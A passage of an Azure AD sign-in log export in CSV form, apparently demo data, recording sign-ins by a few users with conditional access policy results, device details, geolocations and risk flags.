'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c3a7ae11-3090-46d7-95b6-d205871e0600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c3a7ae11-3090-46d7-95b6-d205871e0600,SigninLogs,Sucess,33.0175209,35.44601059
+272,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,04cb58d1-a8ea-4c2b-8ffb-08527ccabaf7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2dc92ee6-03c4-4d81-9c6d-29ffb3520600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2dc92ee6-03c4-4d81-9c6d-29ffb3520600,SigninLogs,Sucess,36.6404686,-78.26995087
+273,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:54.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db359221-fdda-4bf1-8b37-6f461b180800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f461b180800,SigninLogs,Sucess,34.06555176,-118.2405396
+274,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c2c524fe-3829-4e2f-85cf-90c0ff9b9747,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",011e8186-a783-421c-9de9-872062630600,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,011e8186-a783-421c-9de9-872062630600,SigninLogs,Sucess,-20.54751015,-47.4056282
+275,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:46.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",3f36af51-0198-41cf-a56a-8a51cfbf2c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f36af51-0198-41cf-a56a-8a51cfbf2c00,SigninLogs,Sucess,50.6406517,5.572050095
+276,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:56.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b16f2bc-2817-44a9-bd6a-f07237a9c774,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",24b904d7-063a-4f4c-9637-40c7ece50700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,24b904d7-063a-4f4c-9637-40c7ece50700,SigninLogs,Sucess,50.6406517,5.572050095
+277,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",71693871-d407-425c-bffa-acef920d0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,71693871-d407-425c-bffa-acef920d0600,SigninLogs,Sucess,34.06555176,-118.2405396
+278,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1ca435e5-ea3e-439e-9928-009a002fff13,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e9cfabe1-d666-446f-aeb7-581727c80700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e9cfabe1-d666-446f-aeb7-581727c80700,SigninLogs,Sucess,36.6404686,-78.26995087
